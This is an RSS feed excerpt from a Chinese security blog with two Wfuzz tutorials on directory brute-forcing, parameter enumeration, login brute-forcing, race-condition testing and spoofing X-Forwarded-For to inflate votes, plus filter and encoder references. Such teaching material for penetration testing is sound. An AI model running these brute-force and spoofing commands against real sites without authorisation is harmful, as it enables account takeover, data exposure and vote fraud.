│   ├── Traversal.txt
│   ├── XML.txt
│   ├── XSS.txt
│   └── bad_chars.txt
├── general
│   ├── admin-panels.txt
│   ├── big.txt
│   ├── catala.txt
│   ├── common.txt
│   ├── euskera.txt
│   ├── extensions_common.txt
│   ├── http_methods.txt
│   ├── medium.txt
│   ├── megabeast.txt
│   ├── mutations_common.txt
│   ├── spanish.txt
│   └── test.txt
├── others
│   ├── common_pass.txt
│   └── names.txt
├── stress
│   ├── alphanum_case.txt
│   ├── alphanum_case_extra.txt
│   ├── char.txt
│   ├── doble_uri_hex.txt
│   ├── test_ext.txt
│   └── uri_hex.txt
├── vulns
│   ├── apache.txt
│   ├── cgis.txt
│   ├── coldfusion.txt
│   ├── dirTraversal-nix.txt
│   ├── dirTraversal-win.txt
│   ├── dirTraversal.txt
│   ├── domino.txt
│   ├── fatwire.txt
│   ├── fatwire_pagenames.txt
│   ├── frontpage.txt
│   ├── iis.txt
│   ├── iplanet.txt
│   ├── jrun.txt
│   ├── netware.txt
│   ├── oracle9i.txt
│   ├── sharepoint.txt
│   ├── sql_inj.txt
│   ├── sunas.txt
│   ├── tests.txt
│   ├── tomcat.txt
│   ├── vignette.txt
│   ├── weblogic.txt
│   └── websphere.txt
└── webservices
    ├── ws-dirs.txt
    └── ws-files.txt
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;但相对&lt;a href=&quot;https://github.com/fuzzdb-project/fuzzdb&quot;&gt;FuzzDB&lt;/a&gt;和&lt;a href=&quot;https://github.com/danielmiessler/SecLists&quot;&gt;SecLists&lt;/a&gt;来说还是不够全面不够强大的，当然如果有自己的字典列表最好～&lt;/p&gt;

&lt;p&gt;Wfuzz爆破文件：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist URL/FUZZ.php
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;Wfuzz爆破目录：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist URL/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;遍历枚举参数值&quot;&gt;遍历枚举参数值&lt;/h2&gt;

&lt;p&gt;e.g. 假如你发现了一个未授权漏洞，地址为：http://127.0.0.1/getuser.php?uid=123 可获取uid为123的个人信息&lt;/p&gt;

&lt;p&gt;uid参数可以遍历，已知123为三位数纯数字，需要从000-999进行遍历，也可以使用wfuzz来完成：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,000-999 http://127.0.0.1/getuser.php?uid=FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;使用payloads模块类中的&lt;code&gt;range模块&lt;/code&gt;进行生成。&lt;/p&gt;

&lt;h2 id=&quot;post请求测试&quot;&gt;POST请求测试&lt;/h2&gt;

&lt;p&gt;e.g. 发现一个登录框，没有验证码，想爆破弱口令账户。&lt;/p&gt;

&lt;p&gt;请求地址为：http://127.0.0.1/login.php&lt;/p&gt;

&lt;p&gt;POST请求正文为：username=&amp;amp;password=&lt;/p&gt;

&lt;p&gt;使用wfuzz测试：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w userList -w pwdList -d &quot;username=FUZZ&amp;amp;password=FUZ2Z&quot; http://127.0.0.1/login.php
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;-d&lt;/code&gt;参数传输POST请求正文。&lt;/p&gt;

&lt;h2 id=&quot;cookie测试&quot;&gt;Cookie测试&lt;/h2&gt;

&lt;p&gt;上文 &lt;strong&gt;遍历枚举参数值&lt;/strong&gt; 中说到有未授权漏洞，假设这个漏洞是越权漏洞，要做测试的肯定需要让wfuzz知道你的Cookie才能做测试。&lt;/p&gt;

&lt;p&gt;如下命令即可携带上Cookie：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,000-999 -b session=session -b cookie=cookie http://127.0.0.1/getuser.php?uid=FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;-b&lt;/code&gt;参数指定Cookie，&lt;strong&gt;多个Cookie需要指定多次&lt;/strong&gt;，也可以对Cookie进行测试，仍然使用FUZZ占位符即可。&lt;/p&gt;

&lt;h2 id=&quot;http-headers测试&quot;&gt;HTTP Headers测试&lt;/h2&gt;

&lt;p&gt;e.g. 发现一个刷票的漏洞，这个漏洞需要伪造XFF头（IP）可达到刷票的效果，投票的请求为GET类型，地址为：http://127.0.0.1/get.php?userid=666。&lt;/p&gt;

&lt;p&gt;那么现在我想给userid为666的朋友刷票，可以使用wfuzz完成这类操作：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,0000-9999 -H &quot;X-Forwarded-For: FUZZ&quot; http://127.0.0.1/get.php?userid=666
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;-H&lt;/code&gt;指定HTTP头，多个需要指定多次（同Cookie的-b参数）。&lt;/p&gt;

&lt;h2 id=&quot;测试http请求方法method&quot;&gt;测试HTTP请求方法（Method）&lt;/h2&gt;

&lt;p&gt;e.g. 想测试一个网站(http://127.0.0.1/)支持哪些HTTP请求方法&lt;/p&gt;

&lt;p&gt;使用wfuzz：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z list,&quot;GET-POST-HEAD-PUT&quot; -X FUZZ http://127.0.0.1/
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这条命了中多了 &lt;code&gt;-z list&lt;/code&gt; 和 &lt;code&gt;-X&lt;/code&gt; 参数，&lt;code&gt;-z list&lt;/code&gt;可以自定义一个字典列表（在命令中体现），以&lt;code&gt;-&lt;/code&gt;分割；&lt;code&gt;-X&lt;/code&gt;参数是指定HTTP请求方法类型，因为这里要测试HTTP请求方法，后面的值为&lt;code&gt;FUZZ占位符&lt;/code&gt;。&lt;/p&gt;

&lt;h2 id=&quot;使用代理&quot;&gt;使用代理&lt;/h2&gt;

&lt;p&gt;做测试的时候想使用代理可以使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist -p proxtHost:proxyPort:TYPE URL/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;-p&lt;/code&gt;参数指定&lt;strong&gt;主机:端口:代理类型&lt;/strong&gt;，例如我想使用ssr的，可以使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist -p 127.0.0.1:1087:SOCKS5 URL/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;多个代理可使用多个&lt;code&gt;-p&lt;/code&gt;参数同时指定，wfuzz每次请求都会选取不同的代理进行。&lt;/p&gt;

&lt;h2 id=&quot;认证&quot;&gt;认证&lt;/h2&gt;

&lt;p&gt;想要测试一个需要HTTP Basic Auth保护的内容可使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z list,&quot;username-password&quot; --basic FUZZ:FUZZ URL
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;wfuzz可以通过&lt;code&gt;--basec --ntml --digest&lt;/code&gt;来设置认证头，使用方法都一样：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;--basec/ntml/digest username:password&lt;/code&gt;&lt;/p&gt;

&lt;h2 id=&quot;递归测试&quot;&gt;递归测试&lt;/h2&gt;

&lt;p&gt;使用&lt;code&gt;-R&lt;/code&gt;参数可以指定一个payload被递归的深度(数字)。例如：爆破目录时，我们想使用相同的payload对已发现的目录进行测试，可以使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z list,&quot;admin-login.php-test-dorabox&quot; -R 1 http://127.0.0.1/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;如上命令就是使用了自定义字典列表：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-dict&quot;&gt;admin
login.php
test
dorabox	
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;递归深度为1也就是说当发现某一个目录存在的时候，在存在目录下再递归一次字典。&lt;/p&gt;

&lt;h2 id=&quot;并发和间隔&quot;&gt;并发和间隔&lt;/h2&gt;

&lt;p&gt;wfuzz提供了一些参数可以用来调节HTTP请求的线程&lt;/p&gt;

&lt;p&gt;e.g. 你想测试一个网站的转账请求是否存在HTTP并发漏洞（条件竞争）&lt;/p&gt;

&lt;p&gt;请求地址：http://127.0.0.1/dorabox/race_condition/pay.php&lt;/p&gt;

&lt;p&gt;POST请求正文：money=1&lt;/p&gt;

&lt;p&gt;使用如下命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -z range,0-20 -t 20 -d &quot;money=1&quot; http://127.0.0.1/dorabox/race_condition/pay.php?FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x03.png&quot; alt=&quot;0x03&quot; /&gt;&lt;/p&gt;

&lt;p&gt;测试并发要控制请求次数，在这里为使用&lt;code&gt;range&lt;/code&gt;模块生成0-20，&lt;strong&gt;然后将FUZZ占位符放在URL的参数后不影响测试即可&lt;/strong&gt;，主要是用&lt;code&gt;-t&lt;/code&gt;参数设置并发请求，该参数默认设置都是10。&lt;/p&gt;

&lt;p&gt;另外使用&lt;code&gt;-s&lt;/code&gt;参数可以调节每次发送HTTP的时间间隔。&lt;/p&gt;

&lt;h2 id=&quot;保存测试结果&quot;&gt;保存测试结果&lt;/h2&gt;

&lt;p&gt;wfuzz通过&lt;code&gt;printers&lt;/code&gt;模块来将结果以不同格式保存到文档中，一共有如下几种格式：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;raw       | `Raw` output format
json      | Results in `json` format
csv       | `CSV` printer ftw
magictree | Prints results in `magictree` format
html      | Prints results in `html` format
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;将结果以&lt;code&gt;json&lt;/code&gt;格式输出到文件的命令如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;$ wfuzz -f outfile,json -w wordlist URL/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;使用&lt;code&gt;-f&lt;/code&gt;参数，指定值的格式为&lt;code&gt;输出文件位置,输出格式&lt;/code&gt;。&lt;/p&gt;
</description>
          <pubDate>2018-10-28T00:00:00+08:00</pubDate>
          <link>https://gh0st.cn/archives/2018-10-28/2</link>
          <guid isPermaLink="true">https://gh0st.cn/archives/2018-10-28/2</guid>
        </item>
      
    
      
        <item>
          <title>Wfuzz初上手</title>
          <description>&lt;h1 id=&quot;wfuzz初上手&quot;&gt;Wfuzz初上手&lt;/h1&gt;

&lt;p&gt;Author: Vulkey_Chen&lt;/p&gt;

&lt;p&gt;Blog: gh0st.cn&lt;/p&gt;

&lt;h2 id=&quot;wfuzz是啥玩意&quot;&gt;Wfuzz是啥玩意？&lt;/h2&gt;

&lt;p&gt;wfuzz 是一款Python开发的Web安全模糊测试工具。https://github.com/xmendez/wfuzz&lt;/p&gt;

&lt;p&gt;简单粗暴的功能特点记录：&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;模块化 框架 可编写插件&lt;/li&gt;
  &lt;li&gt;接口 可处理BurpSuite所抓的请求和响应报文&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;简而言之就是wfuzz可以用在做&lt;strong&gt;请求参数参数类的模糊测试&lt;/strong&gt;，也可以用来做&lt;strong&gt;Web目录扫描&lt;/strong&gt;等操作。&lt;/p&gt;

&lt;h2 id=&quot;wfuzz初体验&quot;&gt;Wfuzz初体验&lt;/h2&gt;

&lt;ul&gt;
  &lt;li&gt;安装Wfuzz &lt;code&gt;pip install wfuzz&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;

&lt;h3 id=&quot;简单的使用&quot;&gt;简单的使用&lt;/h3&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w 字典 地址(e.g. https://gh0st.cn/FUZZ)
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;如上命令使用-w参数指定字典位置，然后跟上一个要测试的地址，所列的例子&lt;code&gt;https://gh0st.cn/FUZZ&lt;/code&gt;中有一个&lt;strong&gt;FUZZ&lt;/strong&gt;单词，这个单词可以理解是一个占位符，这样就大概了解了wfuzz的基本运行原理，它会读取字典然后传入占位符进行模糊测试请求。&lt;/p&gt;

&lt;p&gt;实际的使用一遍：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w test_dict.txt https://gh0st.cn/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;返回结果如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;********************************************************
* Wfuzz 2.2.11 - The Web Fuzzer                        *
********************************************************

Target: https://gh0st.cn/FUZZ
Total requests: 6

==================================================================
ID	Response   Lines      Word         Chars          Payload
==================================================================

000004:  C=404      1 L	     121 W	   1636 Ch	  &quot;test123&quot;
000003:  C=404      1 L	     121 W	   1636 Ch	  &quot;456&quot;
000006:  C=404      1 L	     121 W	   1636 Ch	  &quot;admin123&quot;
000005:  C=404      1 L	     121 W	   1636 Ch	  &quot;admin&quot;
000001:  C=404      1 L	     121 W	   1636 Ch	  &quot;abc&quot;
000002:  C=404      1 L	     121 W	   1636 Ch	  &quot;123&quot;

Total time: 2.122055
Processed Requests: 6
Filtered Requests: 0
Requests/sec.: 2.827447
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;通过返回结果我们可以知道很多信息，最需要关注的就是&lt;code&gt;ID、Response、 Lines、Word、Chars、Payload&lt;/code&gt;这一行，从左往右看，依次是&lt;strong&gt;编号、响应状态码、响应报文行数、响应报文字数、响应报文正字符数、测试使用的Payload&lt;/strong&gt;。&lt;/p&gt;

&lt;h3 id=&quot;了解wfuzz&quot;&gt;了解Wfuzz&lt;/h3&gt;

&lt;p&gt;通过&lt;code&gt;-h&lt;/code&gt;或者&lt;code&gt;--help&lt;/code&gt;可以来获取帮助信息。&lt;/p&gt;

&lt;h4 id=&quot;wfuzz模块&quot;&gt;Wfuzz模块&lt;/h4&gt;

&lt;p&gt;如上所述说到wfuzz是模块化的框架，wfuzz默认自带很多模块，模块分为5种类型分别是：&lt;code&gt;payloads&lt;/code&gt;、&lt;code&gt;encoders&lt;/code&gt;、&lt;code&gt;iterators&lt;/code&gt;、&lt;code&gt;printers&lt;/code&gt;和&lt;code&gt;scripts&lt;/code&gt;。&lt;/p&gt;

&lt;p&gt;通过&lt;code&gt;-e&lt;/code&gt;参数可以查看指定模块类型中的模块列表：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -e payloads
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;code&gt;payloads&lt;/code&gt;类的模块列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available payloads:

  Name            | Summary
------------------------------------------------------------------------------------------------------
  guitab          | This payload reads requests from a tab in the GUI
  dirwalk         | Returns filename&apos;s recursively from a local directory.
  file            | Returns each word from a file.
  burpstate       | Returns fuzz results from a Burp state.
  wfuzzp          | Returns fuzz results&apos; URL from a previous stored wfuzz session.
  ipnet           | Returns list of IP addresses of a network.
  bing            | Returns URL results of a given bing API search (needs api key).
  stdin           | Returns each item read from stdin.
  list            | Returns each element of the given word list separated by -.
  hexrand         | Returns random hex numbers from the given range.
  range           | Returns each number of the given range.
  names           | Returns possible usernames by mixing the given words, separated by -, using know
                  | n typical constructions.
  hexrange        | Returns each hex number of the given hex range.
  permutation     | Returns permutations of the given charset and length.
  buffer_overflow | Returns a string using the following pattern A * given number.
  iprange         | Returns list of IP addresses of a given IP range.
  burplog         | Returns fuzz results from a Burp log.
  autorize        | Returns fuzz results&apos; from autororize.
&lt;/code&gt;&lt;/pre&gt;

&lt;h3 id=&quot;wfuzz使用&quot;&gt;Wfuzz使用&lt;/h3&gt;

&lt;p&gt;从上文知道了wfuzz基于一个非常简单的概念：使用payload来替换相应的FUZZ关键词的位置，FUZZ这样的关键词就是&lt;code&gt;占位符&lt;/code&gt;，payload就是输入源。&lt;/p&gt;

&lt;p&gt;通过&lt;code&gt;wfuzz -e payloads&lt;/code&gt;可以获取payloads类的所有模块列表，使用&lt;code&gt;wfuzz -z help&lt;/code&gt;可以获取关于payloads类模块的详细信息，也可以通过&lt;code&gt;--slice&lt;/code&gt;参数来过滤返回信息的结果。&lt;/p&gt;

&lt;p&gt;e.g. &lt;code&gt;wfuzz -z help --slice &quot;names&quot;&lt;/code&gt;&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Name: names 0.1
Categories: default
Summary: Returns possible usernames by mixing the given words, separated by -, using known typical constructions.
Author: Christian Martorella,Adapted to newer versions Xavi Mendez (@xmendez)
Description:
   ie. jon-smith
Parameters:
   + name: Name and surname in the form of name-surname.
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;使用字典&quot;&gt;使用（字典）&lt;/h4&gt;

&lt;p&gt;注：命令中的wordlist表示为字典位置&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code&gt;wfuzz -z file --zP fn=wordlist URL/FUZZ&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code&gt;wfuzz -z file,wordlist URL/FUZZ&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
  &lt;li&gt;
    &lt;p&gt;&lt;code&gt;wfuzz -w wordlist URL/FUZZ&lt;/code&gt;&lt;/p&gt;
  &lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;这里有必要说明下，使用命令意义是一样的，都是使用&lt;code&gt;payloads&lt;/code&gt;模块类中的&lt;code&gt;file&lt;/code&gt;模块，通过&lt;code&gt;wfuzz -z help --slice &quot;file&quot;&lt;/code&gt;看如何使用&lt;code&gt;file&lt;/code&gt;模块：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Name: file 0.1
Categories: default
Summary: Returns each word from a file.
Author: Carlos del Ojo,Christian Martorella,Adapted to newer versions Xavi Mendez (@xmendez)
Description:
   Returns the contents of a dictionary file line by line.
Parameters:
   + fn: Filename of a valid dictionary
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;通过返回的帮助信息，我们知道这个模块需要一个&lt;strong&gt;参数fn&lt;/strong&gt;，这个参数值为字典文件名（绝对路径）。这样子第一条命令一下子就明白了，&lt;code&gt;wfuzz -z file --zP fn=wordlist URL/FUZZ&lt;/code&gt;中的&lt;code&gt;-z file&lt;/code&gt;使用模块，&lt;code&gt;--zP fn=wordlist&lt;/code&gt;是定义&lt;strong&gt;fn参数&lt;/strong&gt;的值（可以这样理解，–zP 这里的P大写代表 Parameters ，然后其他的都是固有个事）&lt;/p&gt;

&lt;p&gt;第二条命令简写了第一条命令的赋值，第三条命令使用&lt;code&gt;-w&lt;/code&gt;，这个参数就是&lt;code&gt;-z file --zP fn&lt;/code&gt;的别名。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;多个字典&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;使用&lt;code&gt;-z&lt;/code&gt; 或&lt;code&gt;-w&lt;/code&gt; 参数可以同时指定多个字典，这时相应的占位符应设置为 &lt;strong&gt;FUZZ,FUZ2Z,FUZ3Z,….,FUZnZ&lt;/strong&gt;, 其中&lt;code&gt;n&lt;/code&gt;代表了占位序号。&lt;/p&gt;

&lt;p&gt;例如想要同时爆破目录、文件名、后缀，可以这样来玩：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w 目录字典路径 -w 文件名字典路径 -w 后缀名字典路径 URL/FUZZ/FUZ2Z.FUZ3Z&lt;/code&gt;&lt;/p&gt;

&lt;h4 id=&quot;过滤器&quot;&gt;过滤器&lt;/h4&gt;

&lt;p&gt;wfuzz具有过滤器功能，在做测试的过程中会因为环境的问题需要进行过滤，例如在做目录扫描的时候，你事先探测并知道了这个网站访问不存在目录的时候使用的是自定义404页面（也就是状态码为200），而你可以选择提取该自定义页面的特征来过滤这些返回结果。&lt;/p&gt;

&lt;p&gt;wfuzz过滤分为两种方法：&lt;strong&gt;隐藏符合过滤条件的结果&lt;/strong&gt; 和 &lt;strong&gt;显示符合过滤条件的结果&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;隐藏响应结果&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;通过&lt;code&gt;--hc&lt;/code&gt;，&lt;code&gt;--hl&lt;/code&gt;，&lt;code&gt;--hw&lt;/code&gt;，&lt;code&gt;--hh&lt;/code&gt;参数可以隐藏某些HTTP响应。&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;--hc&lt;/code&gt; 根据响应报文状态码进行隐藏（hide code）&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;隐藏404：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w wordlist --hc 404 URL/FUZZ&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;隐藏404、403：&lt;/p&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w wordlist --hc 404,403 URL/FUZZ&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;e.g. 使用百度举个例子，运行&lt;code&gt;wfuzz -w test_dict.txt https://www.baidu.com/FUZZ&lt;/code&gt;结果如下&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x00.png&quot; alt=&quot;0x00&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这里所有的测试请求，都是不存在的页面，那么百度的404页面规则就是如上图结果所示：&lt;strong&gt;响应报文状态码（302）、响应报文行数（7）、响应报文字数（18）、响应报文字符数（222）&lt;/strong&gt;，那么下面的就是填空题了～&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;--hl&lt;/code&gt;根据响应报文行数进行隐藏（hide lines）&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w wordlist --hl 7 https://www.baidu.com/FUZZ&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;--hw&lt;/code&gt;根据响应报文字数进行隐藏（hide word）&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w wordlist --hw 18 https://www.baidu.com/FUZZ&lt;/code&gt;&lt;/p&gt;

&lt;ul&gt;
  &lt;li&gt;&lt;code&gt;--hh&lt;/code&gt;根据响应报文字符数进行隐藏（hide chars 这里因为code和chars首字母都是c，–hc参数已经有了，所以hide chars的参数就变成了–hh）&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;&lt;code&gt;wfuzz -w wordlist --hh 222 https://www.baidu.com/FUZZ&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;如果根据单个条件判断相对来说肯定是不精确的，所以整合一下就是这样的命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist --hc 302 --hl 7 --hw 18 --hh 222 https://www.baidu.com/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;这样就可以对&lt;code&gt;https://www.baidu.com/&lt;/code&gt;进行目录扫描咯～&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;显示响应结果&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;显示响应结果的使用方法跟隐藏时的原理一样，只不过参数变为了：&lt;code&gt;--sc&lt;/code&gt;（show code），&lt;code&gt;--sl&lt;/code&gt;（show lines），&lt;code&gt;--sw&lt;/code&gt;（show word），&lt;code&gt;--sh&lt;/code&gt; （show chars）。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;使用Baseline(基准线)&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;过滤器可以是某个HTTP响应的引用，这样的引用我们称为Baseline。&lt;/p&gt;

&lt;p&gt;之前的使用&lt;code&gt;--hh&lt;/code&gt;进行过滤的例子中，还可以使用下面的命令代替：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist --hh BBB https://www.baidu.com/FUZZ{404there}
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x01.png&quot; alt=&quot;0x01&quot; /&gt;&lt;/p&gt;

&lt;p&gt;这条命令的意思应该很容易理解，首先要清楚基准线是什么？换个名字：标准线 or 及格线。&lt;/p&gt;

&lt;p&gt;首先解释下&lt;code&gt;https://www.baidu.com/FUZZ{404there}&lt;/code&gt;的意思，这里代表wfuzz第一个请求是请求&lt;code&gt;https://www.baidu.com/404there&lt;/code&gt;这个网址，在&lt;code&gt;{ }&lt;/code&gt;内的值用来指定wfuzz第一个请求中的FUZZ占位符，而这第一个请求被标记为BBB（&lt;strong&gt;BBB不能换成别的&lt;/strong&gt;）基准线；其次这里使用的参数是&lt;code&gt;--hh&lt;/code&gt;，&lt;strong&gt;也就是以BBB这条请求中的Chars为基准，其他请求的Chars值与BBB相同则隐藏&lt;/strong&gt;。&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;使用正则表达式过滤&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;wfuzz参数&lt;code&gt;--ss&lt;/code&gt;和&lt;code&gt;--hs&lt;/code&gt;可以使用正则表达式来对返回的结果过滤。&lt;/p&gt;

&lt;p&gt;e.g. 在这里一个网站自定义返回页面的内容中包含&lt;code&gt;Not Found&lt;/code&gt;，想根据这个内容进行过滤可以使用如下的命令：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;wfuzz -w wordlist --hs &quot;Not Found&quot; http://127.0.0.1/FUZZ
&lt;/code&gt;&lt;/pre&gt;

&lt;p&gt;&lt;img src=&quot;/images/2018-10-28/0x02.png&quot; alt=&quot;0x02&quot; /&gt;&lt;/p&gt;

&lt;p&gt;得出结论使用方法：&lt;/p&gt;

&lt;pre&gt;&lt;code&gt;wfuzz -w wordlist --hs 正则表达式 URL/FUZZ #隐藏
wfuzz -w wordlist --ss 正则表达式 URL/FUZZ #显示
&lt;/code&gt;&lt;/pre&gt;

&lt;h2 id=&quot;手册&quot;&gt;手册&lt;/h2&gt;

&lt;p&gt;原文来自：DigApis安全 m0nst3r&lt;/p&gt;

&lt;h3 id=&quot;模块种类&quot;&gt;模块种类&lt;/h3&gt;

&lt;h4 id=&quot;payload&quot;&gt;payload&lt;/h4&gt;

&lt;p&gt;payload为wfuzz生成的用于测试的特定字符串，一般情况下，会替代被测试URL中的FUZZ占位符。
当前版本中的wfuzz中可用payloads列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available payloads:
  Name            | Summary                                                                           
------------------------------------------------------------------------------------------------------
  guitab          | 从可视化的标签栏中读取请求                                
  dirwalk         | 递归获得本地某个文件夹中的文件名                            
  file            | 获取一个文件当中的每个词                                                    
  autorize        | 获取autorize的测试结果Returns fuzz results&apos; from autororize.                                            
  wfuzzp          | 从之前保存的wfuzz会话中获取测试结果的URL                   
  ipnet           | 获得一个指定网络的IP地址列表                                        
  bing            | 获得一个使用bing API搜索的URL列表 (需要 api key).                   
  stdin           | 获得从标准输入中的条目                                                
  list            | 获得一个列表中的每一个元素，列表用以 - 符号分格                       
  hexrand         | 从一个指定的范围中随机获取一个hex值                                  
  range           | 获得指定范围内的每一个数值                                          
  names           | 从一个以 - 分隔的列表中，获取以组合方式生成的所有usernames值
  burplog         | 从BurpSuite的记录中获得测试结果                                             
  permutation     | 获得一个在指定charset和length时的字符组合                             
  buffer_overflow | 获得一个包含指定个数个A的字符串.                    
  hexrange        | 获得指定范围内的每一个hex值                                   
  iprange         | 获得指定IP范围内的IP地址列表                                 
  burpstate       | 从BurpSuite的状态下获得测试结果
&lt;/code&gt;&lt;/pre&gt;

&lt;h4 id=&quot;encoder&quot;&gt;encoder&lt;/h4&gt;

&lt;p&gt;encoder的作用是将payload进行编码或加密。
wfuzz的encoder列表如下：&lt;/p&gt;

&lt;pre&gt;&lt;code class=&quot;language-shell&quot;&gt;Available encoders:
  Category      | Name                      | Summary                                                                           
------------------------------------------------------------------------------------------------------------------------
  url_safe, url | urlencode                 | 用`%xx`的方式替换特殊字符， 字母/数字/下划线/半角点/减号不替换
  url_safe, url | double urlencode             | 用`%25xx`的方式替换特殊字符， 字母/数字/下划线/半角点/减号不替换
  url              | uri_double_hex            | 用`%25xx`的方式将所有字符进行编码
  html          | html_escape                | 将`&amp;amp;`，`&amp;lt;`，`&amp;gt;`转换为HTML安全的字符
  html            | html_hexadecimal             | 用 `&amp;amp;#xx;` 的方式替换所有字符
  hashes         | base64                    | 将给定的字符串中的所有字符进行base64编码
  url             | doble_nibble_hex             | 将所有字符以`%%dd%dd`格式进行编码
  db             | mssql_char                | 将所有字符转换为MsSQL语法的`char(xx)`形式
  url             | utf8                        | 将所有字符以`\u00xx` 格式进行编码
  hashes         | md5                         | 将给定的字符串进行md5加密
  default         | random_upper                | 将字符串中随机字符变为大写
  url             | first_nibble_hex          | 将所有字符以`%%dd?` 格式进行编码
  default         | hexlify                    | 每个数据的单个比特转换为两个比特表示的hex表示
  url             | second_nibble_hex         | 将所有字符以`%?%dd` 格式进行编码
  url             | uri_hex                     | 将所有字符以`%xx` 格式进行编码
